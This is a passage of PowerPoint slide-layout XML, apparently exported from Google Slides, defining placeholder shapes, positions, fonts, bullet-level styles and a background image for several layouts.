            <a:off x="5860839" y="285750"/>
            <a:ext cx="2183100" cy="273900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="34275" rIns="68575" bIns="34275" anchor="ctr"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2" name="Google Shape;132;p25"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="514350" y="284956"/>
            <a:ext cx="52437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3" name="Google Shape;133;p25"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8146839" y="285750"/>
            <a:ext cx="4830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134"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="135" name="Google Shape;135;p26" descr="C3-HD-BTM.png"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="3281363"/>
            <a:ext cx="9144000" cy="1862138"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="136" name="Google Shape;136;p26"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="768350" y="565150"/>
            <a:ext cx="7613400" cy="1953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2400"/>
              <a:buFont typeface="Century Gothic"/>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7" name="Google Shape;137;p26"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="977899" y="2524167"/>
            <a:ext cx="7194600" cy="333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100"/>
              <a:buNone/>
              <a:defRPr sz="11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38" name="Google Shape;138;p26"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="768350" y="2969897"/>
            <a:ext cx="7613400" cy="510000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="34275" rIns="68575" bIns="34275" anchor="ctr"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39" name="Google Shape;139;p26"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5860839" y="285750"/>
            <a:ext cx="2183100" cy="273900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="34275" rIns="68575" bIns="34275" anchor="ctr"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0" name="Google Shape;140;p26"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="514350" y="284956"/>
            <a:ext cx="52437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1" name="Google Shape;141;p26"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8146839" y="285750"/>
            <a:ext cx="4830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
        <p:nvSpPr>
          <p:cNvPr id="142" name="Google Shape;142;p26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="357188" y="700088"/>
            <a:ext cx="457200" cy="4386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6000"/>
              <a:buFont typeface="Century Gothic"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="6000" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
                <a:ea typeface="Century Gothic"/>
                <a:cs typeface="Century Gothic"/>
                <a:sym typeface="Century Gothic"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:endParaRPr sz="1100" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="143" name="Google Shape;143;p26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8238172" y="2025968"/>
            <a:ext cx="457200" cy="4386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dk1"/>
              </a:buClr>
              <a:buSzPts val="6000"/>
              <a:buFont typeface="Century Gothic"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="6000" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
                <a:ea typeface="Century Gothic"/>
                <a:cs typeface="Century Gothic"/>
                <a:sym typeface="Century Gothic"/>
              </a:rPr>
              <a:t>”</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144"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="145" name="Google Shape;145;p27" descr="C3-HD-BTM.png"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="3281363"/>
            <a:ext cx="9144000" cy="1862138"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="146" name="Google Shape;146;p27"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="768371" y="843526"/>
            <a:ext cx="7609800" cy="18840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entury Gothic"/>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7" name="Google Shape;147;p27"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="768350" y="2736236"/>
            <a:ext cx="7608600" cy="7500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48" name="Google Shape;148;p27"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5860839" y="284162"/>
            <a:ext cx="2183100" cy="273900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="34275" rIns="68575" bIns="34275" anchor="ctr"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9" name="Google Shape;149;p27"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="514350" y="284162"/>
            <a:ext cx="52437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50" name="Google Shape;150;p27"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8146839" y="285750"/>
            <a:ext cx="4830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2171700" y="571499"/>
            <a:ext cx="6458100" cy="977700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="34275" rIns="68575" bIns="34275" anchor="ctr" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" algn="r"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53" name="Google Shape;153;p28"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="514350" y="1651560"/>
            <a:ext cx="2592300" cy="4632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dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buNone/>
              <a:defRPr sz="1800" b="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>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54" name="Google Shape;154;p28"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="514349" y="2178424"/>
            <a:ext cx="2592300" cy="24855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100"/>
              <a:buNone/>
              <a:defRPr sz="1100"/>
            </a:lvl1pPr>
            <a:lvl2pPr marL="914400" lvl="1" indent="-228600" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="900"/>
              <a:buNone/>
              <a:defRPr sz="900"/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1371600" lvl="2" indent="-228600" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="800"/>
              <a:buNone/>
              <a:defRPr sz="800"/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1828800" lvl="3" indent="-228600" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="700"/>
              <a:buNone/>
              <a:defRPr sz="700"/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2286000" lvl="4" indent="-228600" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="700"/>
              <a:buNone/>
              <a:defRPr sz="700"/>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2743200" lvl="5" indent="-228600" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="700"/>
              <a:buNone/>
              <a:defRPr sz="700"/>
            </a:lvl6pPr>
            <a:lvl7pPr marL="3200400" lvl="6" indent="-228600" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="700"/>
              <a:buNone/>
              <a:defRPr sz="700"/>
            </a:lvl7pPr>
            <a:lvl8pPr marL="3657600" lvl="7" indent="-228600" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="700"/>
              <a:buNone/>
              <a:defRPr sz="700"/>
            </a:lvl8pPr>
            <a:lvl9pPr marL="4114800" lvl="8" indent="-228600" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="700"/>
              <a:buNone/>
              <a:defRPr sz="700"/>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="155" name="Google Shape;155;p28"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3276600" y="1651000"/>
            <a:ext cx="2592300" cy="4698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dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buNone/>
              <a:defRPr sz="1800" b="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>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56" name="Google Shape;156;p28"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3275143" y="2178050"/>
            <a:ext cx="2592300" cy="24861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100"/>
              <a:buNone/>
              <a:defRPr sz="1100"/>
            </a:lvl1pPr>
            <a:lvl2pPr marL="914400" lvl="1" indent="-228600" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="900"/>
              <a:buNone/>
              <a:defRPr sz="900"/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1371600" lvl="2" indent="-228600" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="800"/>
              <a:buNone/>
              <a:defRPr sz="800"/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1828800" lvl="3" indent="-228600" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="700"/>
              <a:buNone/>
              <a:defRPr sz="700"/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2286000" lvl="4" indent="-228600" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="700"/>
              <a:buNone/>
              <a:defRPr sz="700"/>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2743200" lvl="5" indent="-228600" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="700"/>
              <a:buNone/>
              <a:defRPr sz="700"/>
            </a:lvl6pPr>
            <a:lvl7pPr marL="3200400" lvl="6" indent="-228600" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="700"/>
              <a:buNone/>
              <a:defRPr sz="700"/>
            </a:lvl7pPr>
            <a:lvl8pPr marL="3657600" lvl="7" indent="-228600" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="700"/>
              <a:buNone/>
              <a:defRPr sz="700"/>
            </a:lvl8pPr>
            <a:lvl9pPr marL="4114800" lvl="8" indent="-228600" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="700"/>
              <a:buNone/>
              <a:defRPr sz="700"/>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="157" name="Google Shape;157;p28"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6038850" y="1644650"/>
            <a:ext cx="2592300" cy="4698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dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buNone/>
              <a:defRPr sz="1800" b="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>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58" name="Google Shape;158;p28"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="6"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6038851" y="2178424"/>
            <a:ext cx="2592300" cy="24855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100"/>
              <a:buNone/>
              <a:defRPr sz="1100"/>
            </a:lvl1pPr>
            <a:lvl2pPr marL="914400" lvl="1" indent="-228600" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="900"/>
              <a:buNone/>
              <a:defRPr sz="900"/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1371600" lvl="2" indent="-228600" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="800"/>
              <a:buNone/>
              <a:defRPr sz="800"/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1828800" lvl="3" indent="-228600" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="700"/>
              <a:buNone/>
              <a:defRPr sz="700"/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2286000" lvl="4" indent="-228600" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="700"/>
              <a:buNone/>
              <a:defRPr sz="700"/>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2743200" lvl="5" indent="-228600" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="700"/>
              <a:buNone/>
              <a:defRPr sz="700"/>
            </a:lvl6pPr>
            <a:lvl7pPr marL="3200400" lvl="6" indent="-228600" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="700"/>
              <a:buNone/>
              <a:defRPr sz="700"/>
            </a:lvl7pPr>
            <a:lvl8pPr marL="3657600" lvl="7" indent="-228600" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="700"/>
              <a:buNone/>
              <a:defRPr sz="700"/>
            </a:lvl8pPr>
            <a:lvl9pPr marL="4114800" lvl="8" indent="-228600" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="700"/>
              <a:buNone/>
              <a:defRPr sz="700"/>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="159" name="Google Shape;159;p28"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6446520" y="4767263"/>
            <a:ext cx="2183100" cy="273900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="34275" rIns="68575" bIns="34275" anchor="ctr"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60" name="Google Shape;160;p28"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="514350" y="4766884"/>
            <a:ext cx="58293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61" name="Google Shape;161;p28"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6572250" y="285750"/>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2171700" y="571500"/>
            <a:ext cx="6458100" cy="971700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="34275" rIns="68575" bIns="34275" anchor="ctr" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" algn="r"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64" name="Google Shape;164;p29"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="516464" y="3143250"/>
            <a:ext cx="2588700" cy="5121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dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buNone/>
              <a:defRPr sz="1800" b="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>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65" name="Google Shape;165;p29"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="516464" y="1771650"/>
            <a:ext cx="2588700" cy="1143000"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 0"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="50800" dist="50800" dir="5400000" algn="tl" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="41960"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="166" name="Google Shape;166;p29"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="516464" y="3655323"/>
            <a:ext cx="2588700" cy="10086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100"/>
              <a:buNone/>
              <a:defRPr sz="1100"/>
            </a:lvl1pPr>
            <a:lvl2pPr marL="914400" lvl="1" indent="-228600" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
